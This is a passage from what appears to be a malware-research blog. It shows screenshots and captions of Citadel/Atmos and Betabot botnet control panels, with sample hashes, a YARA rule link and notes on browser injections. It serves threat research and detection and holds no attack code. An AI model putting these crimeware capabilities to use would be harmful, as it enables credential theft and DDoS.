src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1CWRGmXr4wacpyk1fWKT5n98a9NjF031uFcAYO1u3Nf3nFENw3PKbWvpYy1BoIizJ9NidJTQy5cdiZCF0AD3DD-BVoJ-lHdakawyeUi_Ie8Kg3kW88oYqUOlx-S23hzAZy2VYkuhoeI/s400/2015-11-17_14-08-41.png" width="400" /></a></div> <br /> <br /> Help:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfX5MmPom_p_r202xqhg9NzW-6NfprU-2diBsENnE6Tqsffpt_EUaSLqT8ouVBumGLQL53V518VQqzlLNPa_R9YvGLb-UaSZaBlzPv43iZCgp01lQONwKjU4m0rfUoHvDnaD5YAzW284/s1600/2015-11-17_14-05-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfX5MmPom_p_r202xqhg9NzW-6NfprU-2diBsENnE6Tqsffpt_EUaSLqT8ouVBumGLQL53V518VQqzlLNPa_R9YvGLb-UaSZaBlzPv43iZCgp01lQONwKjU4m0rfUoHvDnaD5YAzW284/s400/2015-11-17_14-05-07.png" width="400" /></a></div> <br /> /s2/ panel:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNBEU3hS3Cxof5bPFz0dZkxV5gQ8BN4PyJZUXARGPD7r3AwByG1sP-imRP_dpNnacCa3GVHYc1sjqQ3bkicK8r7Yrlph9OdanMtHG2r-BvKfXvNztQQRUdnBTdiJzCnmFs8tvNqoqVAM/s1600/2015-11-17_14-09-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNBEU3hS3Cxof5bPFz0dZkxV5gQ8BN4PyJZUXARGPD7r3AwByG1sP-imRP_dpNnacCa3GVHYc1sjqQ3bkicK8r7Yrlph9OdanMtHG2r-BvKfXvNztQQRUdnBTdiJzCnmFs8tvNqoqVAM/s400/2015-11-17_14-09-30.png" width="400" /></a></div> <br /> /s3/ panel:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn-cD7sIXJQxc2eG5HOxG-Fa5EFeLUwl1WSYLps9pwhw2GVyqgL4CXLUE7Y1TO3GLfv8482DBAwHSMDi3VSkkd3JTnuknN23v4W3xx8Yrvqf8xp246Lv6-cHF75WYNlSnpp3BqXPIU-pI/s1600/2015-11-17_14-10-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn-cD7sIXJQxc2eG5HOxG-Fa5EFeLUwl1WSYLps9pwhw2GVyqgL4CXLUE7Y1TO3GLfv8482DBAwHSMDi3VSkkd3JTnuknN23v4W3xx8Yrvqf8xp246Lv6-cHF75WYNlSnpp3BqXPIU-pI/s400/2015-11-17_14-10-40.png" width="400" /></a></div> <br /> Pony used by one member of the gang:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4s5ekEJW4jGRcg89T4kwrYJWZk03ldnAN5PqRwrxqTe3yoV7gG-8v0edgfj4Z09PABQvIBWBWYoEroJ-a6fwLzsO8mgNmvAhJltwMsdAi8shp2Qw6g8zdpQpnSH-JlB543QqrXXJoBPA/s1600/2015-11-05_03-27-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4s5ekEJW4jGRcg89T4kwrYJWZk03ldnAN5PqRwrxqTe3yoV7gG-8v0edgfj4Z09PABQvIBWBWYoEroJ-a6fwLzsO8mgNmvAhJltwMsdAi8shp2Qw6g8zdpQpnSH-JlB543QqrXXJoBPA/s400/2015-11-05_03-27-28.png" width="338" /></a></div> Browser logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxm9CceaWIBl5uxXWt3_-n03tQzGygJ2_W_galgI18p56PcwHUAx7GDK-xr70MJ8Lza-PJnDTvUxb18j0qAv6hEBUXIirGOje2-68C-XgNGKV_goD8KvVGAI0c7HrxexbYbFKFm7mQc14/s1600/2015-11-05_03-29-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxm9CceaWIBl5uxXWt3_-n03tQzGygJ2_W_galgI18p56PcwHUAx7GDK-xr70MJ8Lza-PJnDTvUxb18j0qAv6hEBUXIirGOje2-68C-XgNGKV_goD8KvVGAI0c7HrxexbYbFKFm7mQc14/s400/2015-11-05_03-29-44.png" width="400" /></a></div> <br /> Citadel 0.0.1.1 samples:<br /> A7D98B79FBDD7EFEBE4945F362D8A233A84D0E8D<br /> C286C31ECC7119DD332F2462C75403D36951D79F<br /> D399AEDA9670073E522B17B37201A1116F7D2B94<br /> BFD9251E135D63F429641804C9A52568A83831CA<br /> 2E28E9ACAC691A40B8FAF5A95B9C92AF0947726F<br /> 5CAC9972BB247502E700735067B3A37E70C90278<br /> 959F8A78868FFE89CD4A0FD6F92D781085584E95<br /> 2716D3DE18616DBAB4B159BACE2F2285DA358C84<br /> 450A638957147A62CA9049830C3452B703875AEE<br /> 7C90F27C0640188EA5CF2498BF5964FF6788E79C<br /> 14C0728175B26446B7F140035612E303C15502CB<br /> 267DA16EC9B114ED5D9F5DEE07C2BF77D4CFD5E6<br /> E6DD260168D6B1B29A03DF1BA875C9065B146CF3<br /> 963FE9DCEDA3A4552FAA88BABD4E9954B05C83D2<br /> 4F6AE5803C2C3EE49D11DAB48CA848F82AE31C16<br /> 8BBFA46A2ADCDF0933876EF920826AB0B02FCC18<br /> <br /> Decrypted Citadel plugins:<br /> B3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78<br /> 0B40F80C025C199F7D940BED572EA08ADE2D52F9<br /> 3B004C68C32C13CAF7F9519B6F7868BF99771F30<br /> Hidden VNC demo: <a href="https://www.youtube.com/watch?v=TDOZfalD_LY">https://www.youtube.com/watch?v=TDOZfalD_LY </a><br /> <br /> Atmos package:<br /> 056709A96FE05793B3544ACB4413A9EF827DCEEF<br />C1B79552B6F770D96B0A0C25C8C8FD87D6D629B9<br /><br /> Other samples (not Atmos):<br /> 02FFC98E2B5495E9C760BDA1D855DCA48A754243<br /> B7AE6D5026C776F123BFC9DAECC07BD872C927B4<br /> 56B58A03ADB175886FBCA449CDB73BE2A82D6FEF<br /> <br /> Some other atmos sample (Courtesy of Kafeine):<br /> 8BBFA46A2ADCDF0933876EF920826AB0B02FCC18<br /> DAABF498242018E3EE16513E2A789D397141C7AC<br /> 04F599D501EA656FB995D1BFA4367F5939631881<br /> <br /> You can find my yara rules for mitigating Atmos here: <a href="https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar">https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar</a><br /> The Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06), till v43.0.2357.134 (2015/07/14)<br /> <br /> Fun thing: I got correlations with a <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4138&amp;p=27388#p27388">CoreBot</a> sample and their webinjects used.<br /> ch_new, wf2, cu_main, citi_new, ebay_new, [...]<br /> Same kind of campaign inside their panels and same custom file names.<br /> <br /> if you look for more infos about Citadel, the community did a great work here <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1465">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1465</a><br /> <br /> 継続は力なり https://www.xylibox.com/2016/02/citadel-0011-atmos.htmlnoreply@blogger.com (Steven K)20tag:blogger.com,1999:blog-5365964245877416061.post-4755907718240540053Wed, 15 Apr 2015 19:19:00 +00002015-04-16T13:10:57.584+02:00BetabotBetabot 1.0.2.5Betabot 1.5.0.0Betabot 1.7.0.1Spit FyreSome of you know Betabot.. if you don't: <a href="http://www.ic3.gov/media/2013/130918.aspx">http://www.ic3.gov/media/2013/130918.aspx</a><br /> <br /> 1.0.2.5 panel:<br /> Dashboard:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVkgQ31q7Y0I5Id-mfm_qDC_M2uNz2bRXTOBmIIrhdIVgcUOh-Il0r00dEXRwT56aGcmaw4QcfpEzPzBFDPrz0OmfEnRnCpgShc1tFRbcNfdkYXurIaCs7DWXOdmpy3rUae4MG7UtJtOg/s1600/23-09-2013+22-24-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVkgQ31q7Y0I5Id-mfm_qDC_M2uNz2bRXTOBmIIrhdIVgcUOh-Il0r00dEXRwT56aGcmaw4QcfpEzPzBFDPrz0OmfEnRnCpgShc1tFRbcNfdkYXurIaCs7DWXOdmpy3rUae4MG7UtJtOg/s1600/23-09-2013+22-24-41.png" height="320" width="400" /></a></div> <br /> extended information:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVl4F0YtD35ZqY-m7EcWRR-jTsR76PRDw11Q18WuaY8fQRm6h5P1mWT6p4ohM09TAWlY-N4R6IRD0-E8baXMBG7VMKAQmRFbJGlwApf4XPDWwWX3TOwYT8YqZf6MLTFCP17Tq3Pf0QRs/s1600/23-09-2013+22-48-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVl4F0YtD35ZqY-m7EcWRR-jTsR76PRDw11Q18WuaY8fQRm6h5P1mWT6p4ohM09TAWlY-N4R6IRD0-E8baXMBG7VMKAQmRFbJGlwApf4XPDWwWX3TOwYT8YqZf6MLTFCP17Tq3Pf0QRs/s1600/23-09-2013+22-48-21.png" height="242" width="400" /></a></div> <br /> Search options:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jlKW0xvrnFmUxdfOfgjHBOvAAAJ5rGFvljGL1NIf0GrvLFkvG9679McelujOK3KcEp9Y9DlgLuS7AULWzzk6weA2uUciJaZoj4pYbZWmVubaCILKbHFvFglya0u3NEnUqLyS39-h_Vs/s1600/23-09-2013+22-25-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jlKW0xvrnFmUxdfOfgjHBOvAAAJ5rGFvljGL1NIf0GrvLFkvG9679McelujOK3KcEp9Y9DlgLuS7AULWzzk6weA2uUciJaZoj4pYbZWmVubaCILKbHFvFglya0u3NEnUqLyS39-h_Vs/s400/23-09-2013+22-25-11.png" height="231" width="400" /></a></div> <br /> Tasks:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSxLoer6WHBmmErHFItQBpOT7LS7CraK1CwYa4Kb00o2i2q4SrcxYtgIBD7o0gPyKiiOxrcVRAXjHUM4VruMYHqsWclsO1usZGAKK9IEM9189ztLtdCYrtN4SvRQHVwCw5T5sQsmKSYU/s1600/23-09-2013+22-26-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSxLoer6WHBmmErHFItQBpOT7LS7CraK1CwYa4Kb00o2i2q4SrcxYtgIBD7o0gPyKiiOxrcVRAXjHUM4VruMYHqsWclsO1usZGAKK9IEM9189ztLtdCYrtN4SvRQHVwCw5T5sQsmKSYU/s400/23-09-2013+22-26-43.png" height="320" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Remove bot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEXZRsWcOHFduFCBBfSi2hPDVjEq69WBWmI8tp5PTaU-FTPnh9ODdHAsCE21fCx5Lcy1W8OLrIXvPNbfS5Pc0sZOdIDIHF7QApCT0k5AXYGh08jG8NCO5bmzYnYA4gkPjdHmAL8d85REs/s1600/23-09-2013+22-34-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEXZRsWcOHFduFCBBfSi2hPDVjEq69WBWmI8tp5PTaU-FTPnh9ODdHAsCE21fCx5Lcy1W8OLrIXvPNbfS5Pc0sZOdIDIHF7QApCT0k5AXYGh08jG8NCO5bmzYnYA4gkPjdHmAL8d85REs/s400/23-09-2013+22-34-17.png" height="366" width="400" /></a></div> <br /> Terminate bot till next reboot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj04NeAhKFodEZo2rK0kNC5MMhDz-ShgSn1ppB2lelwpIzNhp9vfA1aaTsUUD07kEfZWIoFApXpmxdFtf746464rDE77tEPSooYM5-13opW5jgDzjcLv3lykl4KOGgfiFyfKNjNs7K9IEg/s1600/23-09-2013+22-33-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj04NeAhKFodEZo2rK0kNC5MMhDz-ShgSn1ppB2lelwpIzNhp9vfA1aaTsUUD07kEfZWIoFApXpmxdFtf746464rDE77tEPSooYM5-13opW5jgDzjcLv3lykl4KOGgfiFyfKNjNs7K9IEg/s400/23-09-2013+22-33-57.png" height="366" width="400" /></a></div> <br /> Botkill:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibaDg6y35UH1lUM_iDAg_rkS12D2lYuKs-SYI2ecBzw9KcEpVc86l4jvmfy3Vt6rUlssOKVXQYLdAo5LjQQv6Rr7RI5hOLlZNHe7g0JhQPZd3ngui0UTTdfE_dRq3rGfgLc0OxDwN5KA/s1600/23-09-2013+22-33-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjibaDg6y35UH1lUM_iDAg_rkS12D2lYuKs-SYI2ecBzw9KcEpVc86l4jvmfy3Vt6rUlssOKVXQYLdAo5LjQQv6Rr7RI5hOLlZNHe7g0JhQPZd3ngui0UTTdfE_dRq3rGfgLc0OxDwN5KA/s400/23-09-2013+22-33-38.png" height="368" width="400" /></a></div> Socks4:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB_GPJZEND3T3RQAQqf7W3Jvny8ek1pQNtBSkflkZkgJ58A8PrM9-o1pgIhJjYo60xr6c8zQOEfhG-X6OKlqw_DEVDQdJKio1rmba99k9HTnDZMmrUsDowYGSMRB4fMMcr693wR6oWwCY/s1600/23-09-2013+22-33-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB_GPJZEND3T3RQAQqf7W3Jvny8ek1pQNtBSkflkZkgJ58A8PrM9-o1pgIhJjYo60xr6c8zQOEfhG-X6OKlqw_DEVDQdJKio1rmba99k9HTnDZMmrUsDowYGSMRB4fMMcr693wR6oWwCY/s400/23-09-2013+22-33-20.png" height="398" width="400" /></a></div> Set browser homepage:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkiCi8Znpg8bX7nVf24dr5T2R35xjtfL3a2jsSgZs-ueDYaABzP59sN0bt1-xEEWVRpelOoYalCHdPuM7krfBC598c7G30uK_e6d8QMRHf1IPOYIuMbBj67jGCRIeLN1PPivs8-2uUvs/s1600/23-09-2013+22-33-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkiCi8Znpg8bX7nVf24dr5T2R35xjtfL3a2jsSgZs-ueDYaABzP59sN0bt1-xEEWVRpelOoYalCHdPuM7krfBC598c7G30uK_e6d8QMRHf1IPOYIuMbBj67jGCRIeLN1PPivs8-2uUvs/s400/23-09-2013+22-33-01.png" height="358" width="400" /></a></div> <br /> Visit URL option:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJy24YDW_Xug2B_YsiNZWQ6lp_aJ-n44BunVt1th4pFF04_uOLyv-Nb83E7GL8zDOL26wLssYiuEFky_idp2krFOoux-VuYX7RZmxUjoLo1sVGp-1H2i0w2yKIdzwD8FgagApLink64Wg/s1600/23-09-2013+22-32-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJy24YDW_Xug2B_YsiNZWQ6lp_aJ-n44BunVt1th4pFF04_uOLyv-Nb83E7GL8zDOL26wLssYiuEFky_idp2krFOoux-VuYX7RZmxUjoLo1sVGp-1H2i0w2yKIdzwD8FgagApLink64Wg/s400/23-09-2013+22-32-46.png" height="366" width="400" /></a></div> <br /> Update bot option:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipHOly6bhTxZiAKnLYqd1vGT_yOouwoW_1t7eQzLcfLwt2uU_cJPErI02eSQDrREIorMeiECaHDShTcXP2xCm9gdlAk3VU5dTknImrGk0vnlb0Hf69UzKfZkGdqLoR_m7jdCYCgzqlHXA/s1600/23-09-2013+22-32-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipHOly6bhTxZiAKnLYqd1vGT_yOouwoW_1t7eQzLcfLwt2uU_cJPErI02eSQDrREIorMeiECaHDShTcXP2xCm9gdlAk3VU5dTknImrGk0vnlb0Hf69UzKfZkGdqLoR_m7jdCYCgzqlHXA/s400/23-09-2013+22-32-31.png" height="386" width="400" /></a></div> Download file option:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-FvGQKb1e8JNEZ6_RDuTl3eImtGWjClOd4KDJSqkAPHBeoGhVVNQZCRf4aYETyZvxkMGoAZU5RHFEI_12yhuquII24VXxg-DND3jtsBeZJ_3-DD7kqkuU8tPdGlfL7IXxzb6hfn03rg/s1600/23-09-2013+22-32-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-FvGQKb1e8JNEZ6_RDuTl3eImtGWjClOd4KDJSqkAPHBeoGhVVNQZCRf4aYETyZvxkMGoAZU5RHFEI_12yhuquII24VXxg-DND3jtsBeZJ_3-DD7kqkuU8tPdGlfL7IXxzb6hfn03rg/s400/23-09-2013+22-32-13.png" height="400" width="397" /></a></div> DDoS cmd option:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1rrvyafTJY_hIudpk_xJtzBjBIIofmu5GJKhZKvpKud1sgplW0BfR_dwe-NkXVqfCNG8D0JZBRgat2-AV7QpgwDfAYHIy8YO7QfNTW1jFzsWfJw52Tv0tmraQwrHf5ZvVrlztduBNFOE/s1600/23-09-2013+22-31-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1rrvyafTJY_hIudpk_xJtzBjBIIofmu5GJKhZKvpKud1sgplW0BfR_dwe-NkXVqfCNG8D0JZBRgat2-AV7QpgwDfAYHIy8YO7QfNTW1jFzsWfJw52Tv0tmraQwrHf5ZvVrlztduBNFOE/s400/23-09-2013+22-31-43.png" height="400" width="386" /></a></div> <br /> Formgrabber logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEHqVlb-IFCqzk070BSuT1dQz4xb-WACkfnIRtpNRvgHdWa80jonofFzjXDavB7vCMV8_b4XtSlb0C-0Yw9ojWuEGpXMlTxNcqV-oXthafgd0V4n73MuQYVR-RvLECW7tN_lch1CY3hsc/s1600/23-09-2013+22-28-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEHqVlb-IFCqzk070BSuT1dQz4xb-WACkfnIRtpNRvgHdWa80jonofFzjXDavB7vCMV8_b4XtSlb0C-0Yw9ojWuEGpXMlTxNcqV-oXthafgd0V4n73MuQYVR-RvLECW7tN_lch1CY3hsc/s1600/23-09-2013+22-28-53.png" height="320" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> logins:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwpSv5Oz0U7MnKHZKvNtCK5CJf0QehrWuXSRtxzs44Gtl5Lw_M7wrgNlNIQnunuPAUZe0ntHex4lIhI6RTX0JOPlbkgzi5_1OmOhhTBXdb-iot6UjLzdIJmTKuQNgYFVoeoWrO4Rofjic/s1600/23-09-2013+22-29-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwpSv5Oz0U7MnKHZKvNtCK5CJf0QehrWuXSRtxzs44Gtl5Lw_M7wrgNlNIQnunuPAUZe0ntHex4lIhI6RTX0JOPlbkgzi5_1OmOhhTBXdb-iot6UjLzdIJmTKuQNgYFVoeoWrO4Rofjic/s1600/23-09-2013+22-29-07.png" height="320" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> users:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIlowmfK_BAjmlO-jj13Jzq7hAnKvb3mxAEHgtIGBCtBEYeGL2xsM5MQx4HFEW-3QMyo6QPQf04f07NPdYZgyQYsCW2t7etQs7q6azWOGOb90HiRZNE13dwJgf9TflZCj7H2zVoeHIHBw/s1600/23-09-2013+22-29-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIlowmfK_BAjmlO-jj13Jzq7hAnKvb3mxAEHgtIGBCtBEYeGL2xsM5MQx4HFEW-3QMyo6QPQf04f07NPdYZgyQYsCW2t7etQs7q6azWOGOb90HiRZNE13dwJgf9TflZCj7H2zVoeHIHBw/s400/23-09-2013+22-29-18.png" height="320" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-3AW2PK1vEZEogD2U4_dzwprGXEW-YzSHbwDJHyhu_q3zFiRpTenkN6zQG-B6oyrJFBAOcnP9xwS-5T10fobeZ9mpii-VXhlIuS2VJlHDu94alGufsiQklBp_uJ0qVO0jGHQMMs2PWQ/s1600/23-09-2013+22-29-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-3AW2PK1vEZEogD2U4_dzwprGXEW-YzSHbwDJHyhu_q3zFiRpTenkN6zQG-B6oyrJFBAOcnP9xwS-5T10fobeZ9mpii-VXhlIuS2VJlHDu94alGufsiQklBp_uJ0qVO0jGHQMMs2PWQ/s400/23-09-2013+22-29-47.png" height="400" width="362" /></a></div> IP blacklist:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCO82cUHu26JLosaafZV5huvaAXV_kaM-LWSFpCHHlUYLdBQ3VLroWJmRmuuFpU7zgV68oOslQ-36boR-cNy3Ovmlvl6d-4Cm1wvz-O_qdzz5mvfrsatWe_AjzgY1FcgD6lIc3oKuPryk/s1600/23-09-2013+22-30-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCO82cUHu26JLosaafZV5huvaAXV_kaM-LWSFpCHHlUYLdBQ3VLroWJmRmuuFpU7zgV68oOslQ-36boR-cNy3Ovmlvl6d-4Cm1wvz-O_qdzz5mvfrsatWe_AjzgY1FcgD6lIc3oKuPryk/s400/23-09-2013+22-30-38.png" height="371" width="400" /></a></div> <br /> <br /> List of dns recod to modify:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VYoNc37K7EftmSYJdpk35XG5l3nL1Khp23oRv0bF_PNtQx50Bkl7j16_1MK3SdM7gNlu3crfyC6AZUSwtY_dD1CzyP-mPTTg0HGWOsap2EUaGwLbSOQ6Qq4J7pa5Ej530BszF5cPsU8/s1600/23-09-2013+22-30-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9VYoNc37K7EftmSYJdpk35XG5l3nL1Khp23oRv0bF_PNtQx50Bkl7j16_1MK3SdM7gNlu3crfyC6AZUSwtY_dD1CzyP-mPTTg0HGWOsap2EUaGwLbSOQ6Qq4J7pa5Ej530BszF5cPsU8/s400/23-09-2013+22-30-24.png" height="371" width="400" /></a></div> <br /> <br /> Help:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHcYbWn63s_JF19Sb2WUyjAVM_PMFU3rVgQUhIUtOgFE0-L0ImfEDuOn5S0tdm8DUPfxJ00qvvzr5geHcayBm4jFH9fWwoVnVfn9mdHOISgCTYoUb-Zp5tdjlpHPFULvRiY42uHnh5HBo/s1600/23-09-2013+22-29-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHcYbWn63s_JF19Sb2WUyjAVM_PMFU3rVgQUhIUtOgFE0-L0ImfEDuOn5S0tdm8DUPfxJ00qvvzr5geHcayBm4jFH9fWwoVnVfn9mdHOISgCTYoUb-Zp5tdjlpHPFULvRiY42uHnh5HBo/s400/23-09-2013+22-29-58.png" height="320" width="400" /></a></div> <br /> 1.5.0.0:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtfGKtwaWKzXmwH23y3843vooG0uEC-EWQDgjnBKG5SmcwHzz2_pBTDKMjQqf9O7KIBXvO7yapcH2qfwN16Ld9B1lmIiWr_6oNf6xqoTOPRFTJ6JasNgilR7das5kN_oj4s7-ZFR6FQhg/s1600/23-09-2013+22-47-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtfGKtwaWKzXmwH23y3843vooG0uEC-EWQDgjnBKG5SmcwHzz2_pBTDKMjQqf9O7KIBXvO7yapcH2qfwN16Ld9B1lmIiWr_6oNf6xqoTOPRFTJ6JasNgilR7das5kN_oj4s7-ZFR6FQhg/s1600/23-09-2013+22-47-04.png" height="320" width="400" /></a></div> <br /> Tasks:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XCS9_Y5VAaSYvbtHGxt5jIiQK-c3r7ElUAyzGj3PxiuDGDKjHfDcww9uWhi6tiHLPE__46xuk9SMjP7jF1ANhyphenhyphenv2mBLPN1l7cyEN6tD0YeASTg70DJYt1ucHtfVex1U1-21uMsCUZUg/s1600/23-09-2013+22-50-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XCS9_Y5VAaSYvbtHGxt5jIiQK-c3r7ElUAyzGj3PxiuDGDKjHfDcww9uWhi6tiHLPE__46xuk9SMjP7jF1ANhyphenhyphenv2mBLPN1l7cyEN6tD0YeASTg70DJYt1ucHtfVex1U1-21uMsCUZUg/s400/23-09-2013+22-50-02.png" height="320" width="400" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAo0-FeIDSTz4lEgnghFbqNgh_T4FoSeKPkP1vUXwFgBfm5PuKW56-npMKJUhiE1Z0DSWdt40lKBUnOFud8J2oWa_1AJHmSXeHZtjwOjRm3nEVQcsi_ybrnhQGR6c3MjqNlyUWxSL0j2c/s1600/23-09-2013+22-51-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAo0-FeIDSTz4lEgnghFbqNgh_T4FoSeKPkP1vUXwFgBfm5PuKW56-npMKJUhiE1Z0DSWdt40lKBUnOFud8J2oWa_1AJHmSXeHZtjwOjRm3nEVQcsi_ybrnhQGR6c3MjqNlyUWxSL0j2c/s400/23-09-2013+22-51-09.png" height="320" width="400" /></a></div> <br /> 